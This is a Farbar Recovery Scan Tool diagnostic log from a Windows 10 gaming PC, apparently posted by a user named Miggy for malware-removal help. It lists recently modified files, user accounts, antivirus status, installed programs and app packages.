2022-07-30 13:13 - 2020-08-13 00:26 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-07-30 13:13 - 2020-08-13 00:26 - 000002276 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-07-29 19:38 - 2021-07-09 21:35 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mozilla
2022-07-29 19:16 - 2021-11-22 21:01 - 000144856 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll
2022-07-29 19:16 - 2020-09-14 10:45 - 002754000 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll
2022-07-29 19:16 - 2020-09-14 10:45 - 000402904 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll
2022-07-29 19:16 - 2020-09-14 10:45 - 000234960 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy.dll
2022-07-29 19:16 - 2020-09-14 10:45 - 000198096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll
2022-07-29 19:16 - 2020-09-14 10:45 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll
2022-07-29 19:16 - 2020-09-14 10:45 - 000067032 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamemodcontrol.exe
2022-07-28 23:40 - 2021-03-15 13:17 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-07-28 22:43 - 2021-07-09 21:35 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2022-07-28 22:42 - 2021-03-15 13:18 - 000000000 ____D C:\Users\Miggy
2022-07-28 20:18 - 2020-08-01 09:48 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-07-28 19:52 - 2020-08-04 16:37 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2022-07-28 19:11 - 2022-01-10 16:18 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\slobs-client
2022-07-28 18:03 - 2021-12-29 17:50 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\EasyAntiCheat
2022-07-28 15:50 - 2022-05-17 17:09 - 000002493 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk
2022-07-28 15:50 - 2022-01-12 18:36 - 000000000 ____D C:\Program Files\Common Files\PUBG
2022-07-28 15:50 - 2022-01-10 16:17 - 000001976 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk
2022-07-28 15:50 - 2020-07-31 19:48 - 000000000 ____D C:\ProgramData\Riot Games
2022-07-28 15:50 - 2020-07-31 18:24 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-07-28 15:50 - 2020-02-05 16:07 - 000022478 _____ C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1
2022-07-27 20:36 - 2022-05-12 17:24 - 000001386 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2022-07-27 20:36 - 2020-08-01 19:19 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2022-07-27 20:36 - 2020-02-11 17:44 - 000001209 _____ C:\ProgramData\NvcDispCorePlugin.log_backup1
2022-07-27 20:36 - 2020-02-05 16:07 - 000017940 _____ C:\ProgramData\NVDisplayContainerWatchdog.log_backup1
2022-07-27 18:26 - 2021-10-15 21:59 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2022-07-27 18:26 - 2021-07-09 21:35 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2022-07-26 16:24 - 2019-12-07 02:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2022-07-26 16:14 - 2022-06-22 22:58 - 000001130 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk
2022-07-26 16:14 - 2022-01-25 18:36 - 000005016 _____ C:\ProgramData\rsEngine.config.backup
2022-07-26 14:38 - 2021-03-19 22:09 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Vortex
2022-07-26 13:31 - 2021-12-28 23:14 - 000000000 ____D C:\Users\Miggy\AppData\Local\Fallout4
2022-07-24 23:38 - 2021-01-02 18:45 - 000000000 ____D C:\Users\Miggy\AppData\Local\Battle.net
2022-07-24 22:38 - 2022-05-28 20:04 - 000000000 ____D C:\Program Files (x86)\Overwatch
2022-07-24 22:38 - 2021-01-02 18:45 - 000000000 ____D C:\Program Files (x86)\Battle.net
2022-07-23 18:51 - 2022-01-28 21:16 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\qBittorrent
2022-07-23 18:23 - 2022-06-05 14:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\MEGAsync
2022-07-21 23:48 - 2020-08-23 13:56 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\MMFApplications
2022-07-21 23:07 - 2020-08-01 12:57 - 000001425 _____ C:\Users\Miggy\Desktop\Roblox Player.lnk
2022-07-21 23:07 - 2020-08-01 12:52 - 000001248 _____ C:\Users\Miggy\Desktop\Roblox Studio.lnk
2022-07-21 23:07 - 2020-08-01 12:52 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2022-07-21 20:02 - 2022-01-10 16:17 - 000000000 ____D C:\Program Files\Streamlabs OBS
2022-07-20 12:12 - 2020-11-06 18:11 - 000000000 ___HD C:\adobeTemp
2022-07-20 12:11 - 2020-07-31 18:24 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2022-07-20 12:08 - 2021-03-15 13:21 - 000003536 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-07-20 12:06 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Common Files\Adobe
2022-07-19 16:43 - 2020-07-31 20:17 - 000000000 ____D C:\Program Files\Riot Vanguard
2022-07-18 20:58 - 2021-12-10 22:51 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-18 20:58 - 2021-03-15 13:21 - 000003364 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-18 20:58 - 2021-03-15 13:18 - 000002383 _____ C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-07-17 17:51 - 2021-01-12 22:42 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Temp
2022-07-16 21:09 - 2022-02-09 20:48 - 000000000 ____D C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
2022-07-14 14:33 - 2022-06-05 15:02 - 000000000 ____D C:\Users\Miggy\Documents\MEGAsync Downloads
2022-07-13 23:07 - 2021-03-15 13:17 - 000257904 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SystemResources
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\setup
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\DDFs
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-07-13 18:36 - 2019-12-07 02:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-07-13 18:33 - 2021-03-15 13:19 - 003010560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2022-07-13 18:26 - 2020-08-01 15:02 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-07-13 18:23 - 2020-08-01 15:02 - 146546848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2022-07-13 18:22 - 2020-01-24 10:48 - 000000000 ____D C:\Program Files (x86)\AMD
2022-07-12 13:10 - 2020-10-08 10:01 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\SurvivioSteam
2022-07-11 22:21 - 2022-01-22 00:32 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Rayll
2022-07-11 00:47 - 2022-04-09 15:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\FalloutNV
2022-07-10 19:31 - 2021-05-01 00:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\BattlEye
2022-07-10 16:26 - 2022-06-19 19:14 - 000000000 ____D C:\Users\Miggy\Documents\Electronic Arts
2022-07-10 16:17 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Adobe
2022-07-10 16:04 - 2020-10-10 20:06 - 000000000 ____D C:\Users\Miggy\Documents\My Games
2022-07-10 15:38 - 2021-07-16 15:06 - 000000000 ____D C:\Users\Miggy\AppData\Local\Ubisoft Game Launcher
2022-07-07 15:34 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\D3DSCache
2022-07-05 15:18 - 2022-03-12 10:58 - 000000000 ____D C:\Users\Miggy\Desktop\RPCS3
2022-07-02 23:24 - 2020-01-24 10:41 - 000000000 __RHD C:\Users\Public\AccountPictures
==================== Files in the root of some directories ========
2021-05-18 08:49 - 2021-10-15 16:59 - 000000032 _____ () C:\Users\Miggy\AppData\Roaming\.machineId
2021-01-20 10:18 - 2021-01-20 10:18 - 000000116 _____ () C:\Users\Miggy\AppData\Roaming\debug.log
2022-03-08 21:51 - 2022-03-08 22:04 - 000000055 _____ () C:\Users\Miggy\AppData\Roaming\grizzly.ini
2020-11-28 13:16 - 2020-11-28 13:16 - 000000098 _____ () C:\Users\Miggy\AppData\Roaming\LauncherSettings_live.cfg
2020-11-28 12:39 - 2020-11-28 12:39 - 000002577 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_live.bin
2020-11-28 13:06 - 2020-11-28 13:06 - 000000048 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_steam_live.cfg
2020-08-04 16:43 - 2020-08-04 16:43 - 000000000 _____ () C:\Users\Miggy\AppData\Local\oobelibMkey.log
2021-10-18 17:32 - 2021-10-18 17:32 - 000016438 _____ () C:\Users\Miggy\AppData\Local\partner.bmp
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
Here is addition.txt
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-07-2022
Ran by Miggy (30-07-2022 13:26:24)
Running from C:\Users\Miggy\Downloads
Microsoft Windows 10 Home Version 21H2 19044.1826 (X64) (2021-03-15 20:22:02)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
(If an entry is included in the fixlist, it will be removed.)
Administrator (S-1-5-21-2826498334-1472090739-1589450912-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2826498334-1472090739-1589450912-503 - Limited - Disabled)
Guest (S-1-5-21-2826498334-1472090739-1589450912-501 - Limited - Disabled)
Miggy (S-1-5-21-2826498334-1472090739-1589450912-1002 - Administrator - Enabled) => C:\Users\Miggy
WDAGUtilityAccount (S-1-5-21-2826498334-1472090739-1589450912-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
7-Zip 21.02 alpha (x64) (HKLM\...\7-Zip) (Version: 21.02 alpha - Igor Pavlov)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 5.7.1.1 - Adobe Inc.)
Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: 7.7.0.35 - Adobe Inc.)
Adobe Illustrator 2022 (HKLM-x32\...\ILST_26_3_1) (Version: 26.3.1 - Adobe Inc.)
Adobe Photoshop 2022 (HKLM-x32\...\PHSP_23_4_2) (Version: 23.4.2.603 - Adobe Inc.)
Adobe Premiere Pro 2022 (HKLM-x32\...\PPRO_22_5) (Version: 22.5 - Adobe Inc.)
AMD Radeon Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 19.10.16 - Advanced Micro Devices, Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
Balanced (HKLM-x32\...\{0EA45DD4-A825-420C-AFED-C659EFE3B84F}) (Version: 4.00.0000 - Advanced Micro Devices, Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Discord (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Discord) (Version: 0.0.309 - Discord Inc.)
Dolphin (HKLM-x32\...\Dolphin) (Version: 5.0 - Dolphin Team)
EA app (HKLM\...\{C2622085-ABD2-49E5-8AB9-D3D6A642C091}) (Version: 12.0.234.5222 - Electronic Arts) Hidden
EA app (HKLM-x32\...\{c5b4b74e-fcb0-4603-b92d-3d17c96a6d69}) (Version: 12.0.234.5222 - Electronic Arts)
Epic Games Launcher (HKLM-x32\...\{0EE6DDEF-E36B-45EB-9E03-5A266EC8A8F8}) (Version: 1.1.279.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{4B31654B-80C2-405C-91C9-49B14AEB0F42}) (Version: 2.0.32.0 - Epic Games, Inc.)
Fallout: New Vegas (HKLM-x32\...\Fallout: New Vegas_is1) (Version: - )
FL Studio 20 (HKLM-x32\...\FL Studio 20) (Version: - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version: - Image-Line)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 103.0.5060.134 - Google LLC)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 103.0.1264.77 - Microsoft Corporation)
Microsoft Edge WebView2 Runtime (HKLM-x32\...\Microsoft EdgeWebView) (Version: 103.0.1264.71 - Microsoft Corporation)
Microsoft GameInput (HKLM-x32\...\{A9CFD6A1-C0D3-7F37-C220-8B104867EF15}) (Version: 10.1.22621.1011 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\OneDriveSetup.exe) (Version: 22.141.0703.0002 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{7B1FCD52-8F6B-4F12-A143-361EA39F5E7C}) (Version: 3.67.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664 (HKLM\...\{010792BA-551A-3AC0-A7EF-0FAB4156C382}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664 (HKLM\...\{53CF6934-A98D-3D84-9146-FC4EDF3D5641}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 (HKLM-x32\...\{D401961D-3A20-3AC7-943B-6139D5BD490A}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 (HKLM-x32\...\{8122DAB1-ED4D-3676-BB0A-CA368196543E}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29334 (HKLM-x32\...\{b2d0f752-adc5-496e-8f70-8669de01f746}) (Version: 14.28.29334.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.30.30704 (HKLM-x32\...\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}) (Version: 14.30.30704.0 - Microsoft Corporation)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29334 (HKLM-x32\...\{14C49FC8-3E9B-4F29-8526-26629B5CF30B}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29334 (HKLM-x32\...\{0D01A812-82A1-481F-8546-8E28E976F8DF}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.30.30704 (HKLM\...\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.30.30704 (HKLM\...\{662A0088-6FCD-45DD-9EA7-68674058AED5}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{27B34E47-68AE-4802-822A-9F0C187AF84A}) (Version: 1.0.0.0 - Mojang)
Mozilla Firefox (x64 en-US) (HKLM\...\Mozilla Firefox 103.0 (x64 en-US)) (Version: 103.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 89.0.2 - Mozilla)
NVIDIA FrameView SDK 1.2.7521.31103277 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.2.7521.31103277 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.25.1.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.25.1.27 - NVIDIA Corporation)
NVIDIA Graphics Driver 512.59 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 512.59 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.39.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.39.3 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
NVIDIA USBC Driver 1.46.831.832 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_USBC) (Version: 1.46.831.832 - NVIDIA Corporation)
OEM Application Profile (HKLM-x32\...\{84AD2AF7-10C8-0395-66F9-FFAEB4C5DBF1}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
ONN. (HKLM-x32\...\ONN.) (Version: 1.0.0.5.05 - )
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Origin (HKLM-x32\...\Origin) (Version: 10.5.113.50894 - Electronic Arts, Inc.)
Overwatch (HKLM-x32\...\Overwatch) (Version: - Blizzard Entertainment)
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version: 1.6.0 - PCSX2 Team)
r2modman 3.1.25 (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ac231ef6-6414-5f8d-b36f-3b57705721dd) (Version: 3.1.25 - ebkr)
Riot Vanguard (HKLM\...\Riot Vanguard) (Version: - Riot Games, Inc.)
Roblox Player for Miggy (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\roblox-player) (Version: - Roblox Corporation)
Spotify (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Spotify) (Version: 1.1.90.859.gf1bb1e36 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Streamlabs Desktop 1.6.4 (HKLM\...\029c4619-0385-5543-9426-46f9987161d9) (Version: 1.6.4 - General Workings, Inc.)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.8.3 - TeamViewer)
Ubisoft Connect (HKLM-x32\...\Uplay) (Version: 112.3 - Ubisoft)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{0BAA0A93-3AD3-4B19-9105-4C8C3FA92A83}) (Version: 2.67.0.0 - Microsoft Corporation) Hidden
Update for Windows 10 for x64-based Systems (KB4480730) (HKLM\...\{0746492E-47B6-4251-940C-44462DFD74BB}) (Version: 2.55.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{F339C545-24DC-4870-AA32-6EB6B0500B95}) (Version: 1.24.0.0 - Microsoft Corporation) Hidden
UXP WebView Support (HKLM-x32\...\UXPW_1_1_0) (Version: 1.1.0 - Adobe Inc.)
VALORANT (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Riot Game valorant.live) (Version: - Riot Games, Inc)
Vortex (HKLM\...\57979c68-f490-55b8-8fed-8b017a5af2fe) (Version: 1.5.13 - Black Tree Gaming Ltd.)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22925 - Microsoft Corporation)
Windows PC Health Check (HKLM\...\{77ACFAF7-E5AB-410D-BA14-BBEBF89422DE}) (Version: 3.1.2109.29003 - Microsoft Corporation)
Zoom (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ZoomUMX) (Version: 5.10.4 (5035) - Zoom Video Communications, Inc.)
Packages:
=========
Adobe Notification Client -> C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc [2022-04-20] (Adobe Systems Incorporated)
BreeZip -> C:\Program Files\WindowsApps\3138AweZip.AweZip_1.4.16.0_x86__ffd303wmbhcjt [2022-07-28] (BreeZip)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.13.7180.0_x64__8wekyb3d8bbwe [2022-07-28] (Microsoft Studios) [MS Ad]
Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.1.21.0_x64__8wekyb3d8bbwe [2022-07-25] (Microsoft Studios)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.962.0_x64__56jybvy8sckqj [2022-04-26] (NVIDIA Corp.)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2022-01-07] (Microsoft Corporation)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj [2020-07-31] (Realtek Semiconductor Corp)
Visage -> C:\Program Files\WindowsApps\SadSquareStudio.Visage_1.1.0.0_x64__855q6fdw1qbrg [2022-06-22] (SadSquare Studio)
WhatsApp Desktop -> C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2226.5.0_x64__cv1g1gvanyjgm [2022-07-28] (WhatsApp Inc.)
Word Mobile -> C:\Program Files\WindowsApps\Microsoft.Office.Word_16001.14326.21062.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Corporation)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-317A81924068} -> [Creative Cloud Files] => C:\Users\Miggy\Creative Cloud Files [2020-08-04 16:40]
